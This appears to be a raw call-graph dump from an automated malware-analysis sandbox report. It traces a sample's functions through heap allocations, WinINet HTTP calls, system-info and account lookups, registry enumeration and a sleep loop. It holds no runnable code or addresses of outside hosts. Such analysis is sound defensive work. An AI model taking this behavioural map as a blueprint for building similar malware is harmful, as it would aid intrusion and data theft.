RtlAllocateHeap 14168->14171 14169 c25b20 RtlAllocateHeap 14169->14178 14172 c37870 RtlAllocateHeap 14170->14172 14239 c34eac 14170->14239 14175 c347af 14171->14175 14176 c34a3f 14172->14176 14177 c35040 14173->14177 14174 c37870 RtlAllocateHeap 14174->14178 14179 c37870 RtlAllocateHeap 14175->14179 14180 c37870 RtlAllocateHeap 14176->14180 14181 c37870 RtlAllocateHeap 14177->14181 14178->14169 14178->14174 14189 c346c0 17 API calls 14178->14189 14182 c347c7 14179->14182 14183 c34a54 14180->14183 14184 c3505e 14181->14184 14185 c25b20 RtlAllocateHeap 14182->14185 14186 c37870 RtlAllocateHeap 14183->14186 14188 c25b20 RtlAllocateHeap 14184->14188 14190 c347ce 14185->14190 14187 c34a66 14186->14187 14192 c2bd60 6 API calls 14187->14192 14193 c35065 14188->14193 14194 c36b5c Sleep 14189->14194 14191 c284b0 RtlAllocateHeap 14190->14191 14195 c347da 14191->14195 14196 c34a72 14192->14196 14197 c37870 RtlAllocateHeap 14193->14197 14194->14178 14195->14170 14200 c37870 RtlAllocateHeap 14195->14200 14198 c37870 RtlAllocateHeap 14196->14198 14199 c3507a 14197->14199 14201 c34a87 14198->14201 14202 c25b20 RtlAllocateHeap 14199->14202 14203 c347f7 14200->14203 14204 c37870 RtlAllocateHeap 14201->14204 14205 c35081 14202->14205 14206 c25b20 RtlAllocateHeap 14203->14206 14207 c34a9f 14204->14207 14869 c25c60 14205->14869 14213 c347ff 14206->14213 14209 c25b20 RtlAllocateHeap 14207->14209 14210 c34aa6 14209->14210 14211 c284b0 RtlAllocateHeap 14210->14211 14214 c34ab2 14211->14214 14212 c35098 14212->14212 14218 c37f30 RtlAllocateHeap 14212->14218 14215 c3484b 14213->14215 14216 c34e8e 14213->14216 14220 c37870 RtlAllocateHeap 14214->14220 14214->14247 14219 c37f30 RtlAllocateHeap 14215->14219 14737 c38070 14216->14737 14229 c350fd 14218->14229 14228 c34869 shared_ptr 14219->14228 14221 c34ace 14220->14221 14222 c37870 RtlAllocateHeap 14221->14222 14223 c34ae6 14222->14223 14224 c25b20 RtlAllocateHeap 14223->14224 14227 c34aed 14224->14227 14225 c34e93 14232 c34ea7 14225->14232 
14740 c3c0c9 14225->14740 14226 c37870 RtlAllocateHeap 14230 c348f6 14226->14230 14231 c284b0 RtlAllocateHeap 14227->14231 14228->14225 14228->14226 14894 c37c50 14229->14894 14235 c25b20 RtlAllocateHeap 14230->14235 14236 c34af9 14231->14236 14237 c38070 RtlAllocateHeap 14232->14237 14243 c348fe 14235->14243 14241 c37870 RtlAllocateHeap 14236->14241 14236->14247 14237->14239 14238 c35169 14907 c38090 14238->14907 14743 c3c109 14239->14743 14244 c34b16 14241->14244 14245 c37f30 RtlAllocateHeap 14243->14245 14246 c25b20 RtlAllocateHeap 14244->14246 14251 c34959 shared_ptr 14245->14251 14249 c34b1e 14246->14249 14247->14137 14746 c265b0 14247->14746 14248 c351a5 shared_ptr 14253 c37f30 RtlAllocateHeap 14248->14253 14249->14232 14252 c34b6a 14249->14252 14251->14170 14251->14225 14439 c29820 14251->14439 14254 c37f30 RtlAllocateHeap 14252->14254 14258 c3526d shared_ptr 14253->14258 14261 c34b88 shared_ptr 14254->14261 14255 c349e5 __dosmaperr 14255->14170 14444 c58979 14255->14444 14257 c37870 RtlAllocateHeap 14262 c34c15 14257->14262 14259 c24570 RtlAllocateHeap 14258->14259 14263 c3530d 14259->14263 14261->14247 14261->14257 14264 c25b20 RtlAllocateHeap 14262->14264 14265 c37870 RtlAllocateHeap 14263->14265 14268 c34c1d 14264->14268 14266 c35327 14265->14266 14267 c25b20 RtlAllocateHeap 14266->14267 14269 c35332 14267->14269 14270 c37f30 RtlAllocateHeap 14268->14270 14271 c24570 RtlAllocateHeap 14269->14271 14279 c34c78 shared_ptr 14270->14279 14272 c35347 14271->14272 14273 c37870 RtlAllocateHeap 14272->14273 14274 c3535b 14273->14274 14276 c25b20 RtlAllocateHeap 14274->14276 14275 c37870 RtlAllocateHeap 14278 c34d07 14275->14278 14277 c35366 14276->14277 14280 c37870 RtlAllocateHeap 14277->14280 14281 c37870 RtlAllocateHeap 14278->14281 14279->14247 14279->14275 14282 c35384 14280->14282 14283 c34d1c 14281->14283 14284 c25b20 RtlAllocateHeap 14282->14284 14285 c37870 RtlAllocateHeap 14283->14285 14286 c3538f 14284->14286 14287 c34d37 14285->14287 14288 c37870 
RtlAllocateHeap 14286->14288 14289 c25b20 RtlAllocateHeap 14287->14289 14290 c353ad 14288->14290 14291 c34d3e 14289->14291 14292 c25b20 RtlAllocateHeap 14290->14292 14295 c37f30 RtlAllocateHeap 14291->14295 14293 c353b8 14292->14293 14294 c37870 RtlAllocateHeap 14293->14294 14296 c353d6 14294->14296 14297 c34d77 14295->14297 14298 c25b20 RtlAllocateHeap 14296->14298 14448 c342a0 14297->14448 14300 c353e1 14298->14300 14301 c37870 RtlAllocateHeap 14300->14301 14302 c353ff 14301->14302 14303 c25b20 RtlAllocateHeap 14302->14303 14304 c3540a 14303->14304 14305 c37870 RtlAllocateHeap 14304->14305 14306 c35428 14305->14306 14307 c25b20 RtlAllocateHeap 14306->14307 14308 c35433 14307->14308 14309 c37870 RtlAllocateHeap 14308->14309 14310 c35451 14309->14310 14311 c25b20 RtlAllocateHeap 14310->14311 14312 c3545c 14311->14312 14313 c37870 RtlAllocateHeap 14312->14313 14314 c3547a 14313->14314 14315 c25b20 RtlAllocateHeap 14314->14315 14316 c35485 14315->14316 14317 c37870 RtlAllocateHeap 14316->14317 14318 c354a1 14317->14318 14319 c25b20 RtlAllocateHeap 14318->14319 14320 c354ac 14319->14320 14321 c37870 RtlAllocateHeap 14320->14321 14322 c354c3 14321->14322 14323 c25b20 RtlAllocateHeap 14322->14323 14324 c354ce 14323->14324 14325 c37870 RtlAllocateHeap 14324->14325 14326 c354e5 14325->14326 14327 c25b20 RtlAllocateHeap 14326->14327 14328 c354f0 14327->14328 14329 c37870 RtlAllocateHeap 14328->14329 14330 c3550c 14329->14330 14331 c25b20 RtlAllocateHeap 14330->14331 14332 c35517 14331->14332 14912 c38250 14332->14912 14334 c3552b 14916 c38150 14334->14916 14336 c3553f 14337 c38150 RtlAllocateHeap 14336->14337 14338 c35553 14337->14338 14339 c38150 RtlAllocateHeap 14338->14339 14340 c35567 14339->14340 14341 c38250 RtlAllocateHeap 14340->14341 14342 c3557b 14341->14342 14343 c38150 RtlAllocateHeap 14342->14343 14344 c3558f 14343->14344 14345 c38250 RtlAllocateHeap 14344->14345 14346 c355a3 14345->14346 14347 c38150 RtlAllocateHeap 14346->14347 14348 c355b7 14347->14348 
14349 c38250 RtlAllocateHeap 14348->14349 14350 c355cb 14349->14350 14351 c38150 RtlAllocateHeap 14350->14351 14352 c355df 14351->14352 14353 c38250 RtlAllocateHeap 14352->14353 14354 c355f3 14353->14354 14355 c38150 RtlAllocateHeap 14354->14355 14356 c35607 14355->14356 14357 c38250 RtlAllocateHeap 14356->14357 14358 c3561b 14357->14358 14359 c38150 RtlAllocateHeap 14358->14359 14360 c3562f 14359->14360 14361 c38250 RtlAllocateHeap 14360->14361 14362 c35643 14361->14362 14363 c38150 RtlAllocateHeap 14362->14363 14364 c35657 14363->14364 14365 c38250 RtlAllocateHeap 14364->14365 14366 c3566b 14365->14366 14367 c38150 RtlAllocateHeap 14366->14367 14368 c3567f 14367->14368 14369 c38250 RtlAllocateHeap 14368->14369 14370 c35693 14369->14370 14371 c38150 RtlAllocateHeap 14370->14371 14372 c356a7 14371->14372 14373 c38150 RtlAllocateHeap 14372->14373 14374 c356bb 14373->14374 14375 c38150 RtlAllocateHeap 14374->14375 14376 c356cf 14375->14376 14377 c38250 RtlAllocateHeap 14376->14377 14382 c356e3 shared_ptr 14377->14382 14378 c36377 14380 c37870 RtlAllocateHeap 14378->14380 14379 c364cb 14381 c37870 RtlAllocateHeap 14379->14381 14383 c3638d 14380->14383 14384 c364e0 14381->14384 14382->14378 14382->14379 14385 c25b20 RtlAllocateHeap 14383->14385 14386 c37870 RtlAllocateHeap 14384->14386 14388 c36398 14385->14388 14387 c364f5 14386->14387 14924 c24960 14387->14924 14390 c38250 RtlAllocateHeap 14388->14390 14401 c363ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14390->14401 14391 c36504 14931 c375d0 14391->14931 14393 c36646 14394 c37870 RtlAllocateHeap 14393->14394 14395 c3665c 14394->14395 14396 c25b20 RtlAllocateHeap 14395->14396 14398 c36667 14396->14398 14397 c38bd0 RtlAllocateHeap 14399 c3654b 14397->14399 14400 c38150 RtlAllocateHeap 14398->14400 14399->14393 14399->14397 14400->14401 14401->14134 14943 c25850 14402->14943 14406 c25b7a 14962 c24af0 14406->14962 14408 c25b8b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 
14408->14141 14410 c2bdb2 14409->14410 14411 c2c1a1 14409->14411 14410->14411 14413 c2bdc6 InternetOpenW InternetConnectA 14410->14413 14412 c37f30 RtlAllocateHeap 14411->14412 14418 c2c14e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14412->14418 14414 c37870 RtlAllocateHeap 14413->14414 14415 c2be3d 14414->14415 14416 c25b20 RtlAllocateHeap 14415->14416 14417 c2be48 HttpOpenRequestA 14416->14417 14420 c2be71 shared_ptr 14417->14420 14418->14150 14421 c37870 RtlAllocateHeap 14420->14421 14422 c2bed9 14421->14422 14423 c25b20 RtlAllocateHeap 14422->14423 14424 c2bee4 14423->14424 14425 c37870 RtlAllocateHeap 14424->14425 14426 c2befd 14425->14426 14427 c25b20 RtlAllocateHeap 14426->14427 14428 c2bf08 HttpSendRequestA 14427->14428 14430 c2bf2b shared_ptr 14428->14430 14431 c2bfb3 InternetReadFile 14430->14431 14432 c2bfda 14431->14432 14437 c285d0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14433->14437 14438 c28505 shared_ptr 14433->14438 14434 c28697 14436 c38070 RtlAllocateHeap 14434->14436 14435 c37f30 RtlAllocateHeap 14435->14438 14436->14437 14437->14168 14438->14434 14438->14435 14438->14437 14440 c37870 RtlAllocateHeap 14439->14440 14441 c2984e 14440->14441 14442 c25b20 RtlAllocateHeap 14441->14442 14443 c29857 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr __cftof 14442->14443 14443->14255 14445 c58994 14444->14445 14988 c586d7 14445->14988 14447 c34a0d 14447->14170 14447->14225 14449 c37870 RtlAllocateHeap 14448->14449 14450 c342e2 14449->14450 14451 c37870 RtlAllocateHeap 14450->14451 14452 c342f4 14451->14452 14453 c284b0 RtlAllocateHeap 14452->14453 14454 c342fd 14453->14454 14455 c34556 14454->14455 14480 c34308 shared_ptr 14454->14480 14456 c37870 RtlAllocateHeap 14455->14456 14457 c34567 14456->14457 14458 c37870 RtlAllocateHeap 14457->14458 14460 c3457c 14458->14460 14459 c346b3 14461 c38070 RtlAllocateHeap 14459->14461 14463 c37870 RtlAllocateHeap 14460->14463 14467 c34520 shared_ptr 
14461->14467 14462 c3468e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14462->14247 14464 c3458e 14463->14464 14466 c33550 4 API calls 14464->14466 14466->14467 14467->14462 14469 c37870 RtlAllocateHeap 14467->14469 14580 c34d80 shared_ptr 14467->14580 14468 c34e69 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14468->14247 14470 c3471c 14469->14470 14471 c25b20 RtlAllocateHeap 14470->14471 14472 c34723 14471->14472 14474 c37870 RtlAllocateHeap 14472->14474 14473 c265b0 5 API calls 14475 c34f25 14473->14475 14476 c34735 14474->14476 14477 c26920 RtlAllocateHeap 14475->14477 14478 c37870 RtlAllocateHeap 14476->14478 14484 c34f35 shared_ptr 14477->14484 14479 c34747 14478->14479 14481 c2bd60 6 API calls 14479->14481 14480->14459 14480->14467 14487 c37870 RtlAllocateHeap 14480->14487 14499 c37f30 RtlAllocateHeap 14480->14499 15014 c391b0 14480->15014 15019 c33550 14480->15019 14482 c34753 14481->14482 14483 c37870 RtlAllocateHeap 14482->14483 14486 c34768 14483->14486 14490 c34fee shared_ptr 14484->14490 14519 c36ab6 14484->14519 14485 c27d00 9 API calls 14488 c34ffd 14485->14488 14489 c37870 RtlAllocateHeap 14486->14489 14487->14480 14491 c24570 RtlAllocateHeap 14488->14491 14492 c34780 14489->14492 14490->14485 14494 c3500a 14491->14494 14495 c25b20 RtlAllocateHeap 14492->14495 14496 c282b0 2 API calls 14494->14496 14498 c34787 14495->14498 14497 c35016 14496->14497 14500 c24570 RtlAllocateHeap 14497->14500 14501 c284b0 RtlAllocateHeap 14498->14501 14499->14480 14502 c35023 14500->14502 14503 c34793 14501->14503 14507 c24570 RtlAllocateHeap 14502->14507 14504 c34a19 14503->14504 14505 c37870 RtlAllocateHeap 14503->14505 14506 c37870 RtlAllocateHeap 14504->14506 14574 c34eac 14504->14574 14509 c347af 14505->14509 14510 c34a3f 14506->14510 14511 c35040 14507->14511 14508 c37870 RtlAllocateHeap 14508->14519 14512 c37870 RtlAllocateHeap 14509->14512 14513 c37870 RtlAllocateHeap 14510->14513 14514 c37870 RtlAllocateHeap 
14511->14514 14516 c347c7 14512->14516 14517 c34a54 14513->14517 14518 c3505e 14514->14518 14515 c25b20 RtlAllocateHeap 14515->14519 14520 c25b20 RtlAllocateHeap 14516->14520 14521 c37870 RtlAllocateHeap 14517->14521 14523 c25b20 RtlAllocateHeap 14518->14523 14519->14508 14519->14515 14524 c346c0 17 API calls 14519->14524 14525 c347ce 14520->14525 14522 c34a66 14521->14522 14527 c2bd60 6 API calls 14522->14527 14528 c35065 14523->14528 14529 c36b5c Sleep 14524->14529 14526 c284b0 RtlAllocateHeap 14525->14526 14530 c347da 14526->14530 14531 c34a72 14527->14531 14532 c37870 RtlAllocateHeap 14528->14532 14529->14519 14530->14504 14535 c37870 RtlAllocateHeap 14530->14535 14533 c37870 RtlAllocateHeap 14531->14533 14534 c3507a 14532->14534 14536 c34a87 14533->14536 14537 c25b20 RtlAllocateHeap 14534->14537 14538 c347f7 14535->14538 14539 c37870 RtlAllocateHeap 14536->14539 14540 c35081 14537->14540 14541 c25b20 RtlAllocateHeap 14538->14541 14542 c34a9f 14539->14542 14543 c25c60 5 API calls 14540->14543 14548 c347ff 14541->14548 14544 c25b20 RtlAllocateHeap 14542->14544 14547 c35098 14543->14547 14545 c34aa6 14544->14545 14546 c284b0 RtlAllocateHeap 14545->14546 14549 c34ab2 14546->14549 14547->14547 14553 c37f30 RtlAllocateHeap 14547->14553 14550 c3484b 14548->14550 14551 c34e8e 14548->14551 14555 c37870 RtlAllocateHeap 14549->14555 14549->14580 14554 c37f30 RtlAllocateHeap 14550->14554 14552 c38070 RtlAllocateHeap 14551->14552 14560 c34e93 14552->14560 14564 c350fd 14553->14564 14563 c34869 shared_ptr 14554->14563 14556 c34ace 14555->14556 14557 c37870 RtlAllocateHeap 14556->14557 14558 c34ae6 14557->14558 14559 c25b20 RtlAllocateHeap 14558->14559 14562 c34aed 14559->14562 14567 c34ea7 14560->14567 14568 c3c0c9 std::_Xinvalid_argument RtlAllocateHeap 14560->14568 14561 c37870 RtlAllocateHeap 14565 c348f6 14561->14565 14566 c284b0 RtlAllocateHeap 14562->14566 14563->14560 14563->14561 14569 c37c50 RtlAllocateHeap 14564->14569 14570 c25b20 RtlAllocateHeap 14565->14570 
14571 c34af9 14566->14571 14572 c38070 RtlAllocateHeap 14567->14572 14568->14567 14573 c35169 14569->14573 14578 c348fe 14570->14578 14576 c37870 RtlAllocateHeap 14571->14576 14571->14580 14572->14574 14575 c38090 RtlAllocateHeap 14573->14575 14577 c3c109 RtlAllocateHeap 14574->14577 14583 c351a5 shared_ptr 14575->14583 14579 c34b16 14576->14579 14577->14580 14581 c37f30 RtlAllocateHeap 14578->14581 14582 c25b20 RtlAllocateHeap 14579->14582 14580->14468 14580->14473 14586 c34959 shared_ptr 14581->14586 14584 c34b1e 14582->14584 14588 c37f30 RtlAllocateHeap 14583->14588 14584->14567 14587 c34b6a 14584->14587 14585 c29820 RtlAllocateHeap 14590 c349e5 __dosmaperr 14585->14590 14586->14504 14586->14560 14586->14585 14589 c37f30 RtlAllocateHeap 14587->14589 14593 c3526d shared_ptr 14588->14593 14596 c34b88 shared_ptr 14589->14596 14590->14504 14591 c58979 3 API calls 14590->14591 14595 c34a0d 14591->14595 14592 c37870 RtlAllocateHeap 14597 c34c15 14592->14597 14594 c24570 RtlAllocateHeap 14593->14594 14598 c3530d 14594->14598 14595->14504 14595->14560 14596->14580 14596->14592 14599 c25b20 RtlAllocateHeap 14597->14599 14600 c37870 RtlAllocateHeap 14598->14600 14603 c34c1d 14599->14603 14601 c35327 14600->14601 14602 c25b20 RtlAllocateHeap 14601->14602 14604 c35332 14602->14604 14605 c37f30 RtlAllocateHeap 14603->14605 14606 c24570 RtlAllocateHeap 14604->14606 14614 c34c78 shared_ptr 14605->14614 14607 c35347 14606->14607 14608 c37870 RtlAllocateHeap 14607->14608 14609 c3535b 14608->14609 14611 c25b20 RtlAllocateHeap 14609->14611 14610 c37870 RtlAllocateHeap 14613 c34d07 14610->14613 14612 c35366 14611->14612 14615 c37870 RtlAllocateHeap 14612->14615 14616 c37870 RtlAllocateHeap 14613->14616 14614->14580 14614->14610 14617 c35384 14615->14617 14618 c34d1c 14616->14618 14619 c25b20 RtlAllocateHeap 14617->14619 14620 c37870 RtlAllocateHeap 14618->14620 14621 c3538f 14619->14621 14622 c34d37 14620->14622 14623 c37870 RtlAllocateHeap 14621->14623 14624 c25b20 RtlAllocateHeap 
14622->14624 14625 c353ad 14623->14625 14626 c34d3e 14624->14626 14627 c25b20 RtlAllocateHeap 14625->14627 14630 c37f30 RtlAllocateHeap 14626->14630 14628 c353b8 14627->14628 14629 c37870 RtlAllocateHeap 14628->14629 14631 c353d6 14629->14631 14632 c34d77 14630->14632 14633 c25b20 RtlAllocateHeap 14631->14633 14634 c342a0 17 API calls 14632->14634 14635 c353e1 14633->14635 14634->14580 14636 c37870 RtlAllocateHeap 14635->14636 14637 c353ff 14636->14637 14638 c25b20 RtlAllocateHeap 14637->14638 14639 c3540a 14638->14639 14640 c37870 RtlAllocateHeap 14639->14640 14641 c35428 14640->14641 14642 c25b20 RtlAllocateHeap 14641->14642 14643 c35433 14642->14643 14644 c37870 RtlAllocateHeap 14643->14644 14645 c35451 14644->14645 14646 c25b20 RtlAllocateHeap 14645->14646 14647 c3545c 14646->14647 14648 c37870 RtlAllocateHeap 14647->14648 14649 c3547a 14648->14649 14650 c25b20 RtlAllocateHeap 14649->14650 14651 c35485 14650->14651 14652 c37870 RtlAllocateHeap 14651->14652 14653 c354a1 14652->14653 14654 c25b20 RtlAllocateHeap 14653->14654 14655 c354ac 14654->14655 14656 c37870 RtlAllocateHeap 14655->14656 14657 c354c3 14656->14657 14658 c25b20 RtlAllocateHeap 14657->14658 14659 c354ce 14658->14659 14660 c37870 RtlAllocateHeap 14659->14660 14661 c354e5 14660->14661 14662 c25b20 RtlAllocateHeap 14661->14662 14663 c354f0 14662->14663 14664 c37870 RtlAllocateHeap 14663->14664 14665 c3550c 14664->14665 14666 c25b20 RtlAllocateHeap 14665->14666 14667 c35517 14666->14667 14668 c38250 RtlAllocateHeap 14667->14668 14669 c3552b 14668->14669 14670 c38150 RtlAllocateHeap 14669->14670 14671 c3553f 14670->14671 14672 c38150 RtlAllocateHeap 14671->14672 14673 c35553 14672->14673 14674 c38150 RtlAllocateHeap 14673->14674 14675 c35567 14674->14675 14676 c38250 RtlAllocateHeap 14675->14676 14677 c3557b 14676->14677 14678 c38150 RtlAllocateHeap 14677->14678 14679 c3558f 14678->14679 14680 c38250 RtlAllocateHeap 14679->14680 14681 c355a3 14680->14681 14682 c38150 RtlAllocateHeap 14681->14682 
14683 c355b7 14682->14683 14684 c38250 RtlAllocateHeap 14683->14684 14685 c355cb 14684->14685 14686 c38150 RtlAllocateHeap 14685->14686 14687 c355df 14686->14687 14688 c38250 RtlAllocateHeap 14687->14688 14689 c355f3 14688->14689 14690 c38150 RtlAllocateHeap 14689->14690 14691 c35607 14690->14691 14692 c38250 RtlAllocateHeap 14691->14692 14693 c3561b 14692->14693 14694 c38150 RtlAllocateHeap 14693->14694 14695 c3562f 14694->14695 14696 c38250 RtlAllocateHeap 14695->14696 14697 c35643 14696->14697 14698 c38150 RtlAllocateHeap 14697->14698 14699 c35657 14698->14699 14700 c38250 RtlAllocateHeap 14699->14700 14701 c3566b 14700->14701 14702 c38150 RtlAllocateHeap 14701->14702 14703 c3567f 14702->14703 14704 c38250 RtlAllocateHeap 14703->14704 14705 c35693 14704->14705 14706 c38150 RtlAllocateHeap 14705->14706 14707 c356a7 14706->14707 14708 c38150 RtlAllocateHeap 14707->14708 14709 c356bb 14708->14709 14710 c38150 RtlAllocateHeap 14709->14710 14711 c356cf 14710->14711 14712 c38250 RtlAllocateHeap 14711->14712 14717 c356e3 shared_ptr 14712->14717 14713 c36377 14715 c37870 RtlAllocateHeap 14713->14715 14714 c364cb 14716 c37870 RtlAllocateHeap 14714->14716 14718 c3638d 14715->14718 14719 c364e0 14716->14719 14717->14713 14717->14714 14720 c25b20 RtlAllocateHeap 14718->14720 14721 c37870 RtlAllocateHeap 14719->14721 14723 c36398 14720->14723 14722 c364f5 14721->14722 14724 c24960 RtlAllocateHeap 14722->14724 14725 c38250 RtlAllocateHeap 14723->14725 14726 c36504 14724->14726 14736 c363ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14725->14736 14727 c375d0 RtlAllocateHeap 14726->14727 14734 c3654b 14727->14734 14728 c36646 14729 c37870 RtlAllocateHeap 14728->14729 14730 c3665c 14729->14730 14731 c25b20 RtlAllocateHeap 14730->14731 14733 c36667 14731->14733 14732 c38bd0 RtlAllocateHeap 14732->14734 14735 c38150 RtlAllocateHeap 14733->14735 14734->14728 14734->14732 14735->14736 14736->14247 14738 c3c109 RtlAllocateHeap 14737->14738 14739 c3807a 
14738->14739 14739->14225 15138 c3c019 14740->15138 14742 c3c0da std::_Throw_future_error 15141 c3c08d 14743->15141 14745 c3c11a std::_Throw_future_error 14745->14247 14769 4ef0bcc 14746->14769 14747 c2660f LookupAccountNameA 14748 c26662 14747->14748 14749 c37870 RtlAllocateHeap 14748->14749 14750 c26676 14749->14750 14751 c25b20 RtlAllocateHeap 14750->14751 14752 c26681 14751->14752 15144 c22280 14752->15144 14754 c26699 shared_ptr 14755 c37870 RtlAllocateHeap 14754->14755 14767 c268b3 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14754->14767 14756 c26702 14755->14756 14757 c25b20 RtlAllocateHeap 14756->14757 14758 c2670d 14757->14758 14759 c22280 3 API calls 14758->14759 14768 c26727 shared_ptr 14759->14768 14760 c26822 14761 c37f30 RtlAllocateHeap 14760->14761 14763 c2686c 14761->14763 14762 c37870 RtlAllocateHeap 14762->14768 14764 c37f30 RtlAllocateHeap 14763->14764 14764->14767 14765 c25b20 RtlAllocateHeap 14765->14768 14766 c22280 3 API calls 14766->14768 14767->14144 14768->14760 14768->14762 14768->14765 14768->14766 14768->14767 14769->14747 14778 c26998 shared_ptr 14770->14778 14779 c26c71 14770->14779 14771 c26d33 14774 c38070 RtlAllocateHeap 14771->14774 14772 c26c94 14773 c37f30 RtlAllocateHeap 14772->14773 14776 c26cb3 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14773->14776 14774->14776 14775 c37f30 RtlAllocateHeap 14775->14778 14776->14154 14777 c391b0 RtlAllocateHeap 14777->14778 14778->14771 14778->14775 14778->14776 14778->14777 14778->14779 14779->14771 14779->14772 14781 c27d66 __cftof 14780->14781 14782 c37870 RtlAllocateHeap 14781->14782 14821 c27eb8 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14781->14821 14783 c27d97 14782->14783 14784 c25b20 RtlAllocateHeap 14783->14784 14785 c27da2 14784->14785 14786 c37870 RtlAllocateHeap 14785->14786 14787 c27dc4 14786->14787 14788 c25b20 RtlAllocateHeap 14787->14788 14790 c27dcf shared_ptr 14788->14790 14789 c27ea3 GetNativeSystemInfo 
14791 c27ea7 14789->14791 14790->14789 14790->14791 14790->14821 14792 c27fe9 14791->14792 14793 c27f0f 14791->14793 14791->14821 14794 c37870 RtlAllocateHeap 14792->14794 14795 c37870 RtlAllocateHeap 14793->14795 14796 c28015 14794->14796 14797 c27f30 14795->14797 14798 c25b20 RtlAllocateHeap 14796->14798 14799 c25b20 RtlAllocateHeap 14797->14799 14800 c2801c 14798->14800 14801 c27f37 14799->14801 14803 c37870 RtlAllocateHeap 14800->14803 14802 c37870 RtlAllocateHeap 14801->14802 14804 c27f4f 14802->14804 14805 c28034 14803->14805 14806 c25b20 RtlAllocateHeap 14804->14806 14807 c25b20 RtlAllocateHeap 14805->14807 14808 c27f56 14806->14808 14809 c2803b 14807->14809 14810 c25c60 5 API calls 14808->14810 14811 c25c60 5 API calls 14809->14811 14812 c27f70 14810->14812 14813 c28051 14811->14813 15266 c58a81 14812->15266 14814 c37870 RtlAllocateHeap 14813->14814 14816 c2806c 14814->14816 14817 c25b20 RtlAllocateHeap 14816->14817 14818 c28073 14817->14818 14819 c25640 RtlAllocateHeap 14818->14819 14820 c28082 14819->14820 14822 c37870 RtlAllocateHeap 14820->14822 14821->14156 14823 c280bd 14822->14823 14824 c25b20 RtlAllocateHeap 14823->14824 14825 c280c4 14824->14825 14826 c37870 RtlAllocateHeap 14825->14826 14827 c280dc 14826->14827 14828 c25b20 RtlAllocateHeap 14827->14828 14829 c280e3 14828->14829 14830 c25c60 5 API calls 14829->14830 14831 c280f9 14830->14831 14832 c37870 RtlAllocateHeap 14831->14832 14833 c28114 14832->14833 14834 c25b20 RtlAllocateHeap 14833->14834 14835 c2811b 14834->14835 14836 c25640 RtlAllocateHeap 14835->14836 14837 c2812a 14836->14837 14838 c37870 RtlAllocateHeap 14837->14838 14839 c28165 14838->14839 14840 c25b20 RtlAllocateHeap 14839->14840 14841 c2816c 14840->14841 14842 c37870 RtlAllocateHeap 14841->14842 14843 c28184 14842->14843 14844 c25b20 RtlAllocateHeap 14843->14844 14845 c2818b 14844->14845 14846 c25c60 5 API calls 14845->14846 14847 c281a1 14846->14847 14848 c37870 RtlAllocateHeap 14847->14848 14849 c281bc 14848->14849 14850 
c25b20 RtlAllocateHeap 14849->14850 14851 c281c3 14850->14851 14852 c25640 RtlAllocateHeap 14851->14852 14852->14821 14854 c24594 14853->14854 14854->14854 14855 c37f30 RtlAllocateHeap 14854->14855 14856 c24607 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 14854->14856 14855->14856 14856->14160 14858 c28315 __cftof 14857->14858 14859 c37870 RtlAllocateHeap 14858->14859 14868 c28333 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 14858->14868 14860 c2834c 14859->14860 14861 c25b20 RtlAllocateHeap 14860->14861 14862 c28357 14861->14862 14863 c37870 RtlAllocateHeap 14862->14863 14864 c28379 14863->14864 14865 c25b20 RtlAllocateHeap 14864->14865 14866 c28384 shared_ptr 14865->14866 14867 c28454 GetNativeSystemInfo 14866->14867 14866->14868 14867->14868 14868->14163 15269 c54020 14869->15269 14872 c25d10 RegCloseKey 14873 c25d36 14872->14873 14873->14873 14874 c37f30 RtlAllocateHeap 14873->14874 14876 c25d4e 14874->14876 14875 c25db6 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14875->14212 14876->14875 14877 c37f30 RtlAllocateHeap 14876->14877 14878 c25f99 14877->14878 14879 c37f30 RtlAllocateHeap 14878->14879 14880 c25fcd 14879->14880 14881 c37f30 RtlAllocateHeap 14880->14881 14882 c25ffe 14881->14882 14883 c37f30 RtlAllocateHeap 14882->14883 14884 c2602f 14883->14884 14885 c37f30 RtlAllocateHeap 14884->14885 14886 c26060 RegOpenKeyExA 14885->14886 14887 c2645a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14886->14887 14892 c260b3 __cftof 14886->14892 14887->14212 14888 c26153 RegEnumValueW 14888->14892 14889 c37c50 RtlAllocateHeap 14889->14892 14890 c38090 RtlAllocateHeap 14890->14892 14891 c37870 RtlAllocateHeap 14891->14892 14892->14887 14892->14888 14892->14889 14892->14890 14892->14891 14893 c25c60 RtlAllocateHeap 14892->14893 14893->14892 14895 c37c9c 14894->14895 14898 c37c71 14894->14898 14896 c37d90 14895->14896 14899 c37d8b 14895->14899 14900 c37cf0 14895->14900 14901 c37d17 14895->14901 14897 c391a0 
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C3795C
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C37968
                                                                                                                                                                    • Part of subcall function 00C37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C37971
                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C307C5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
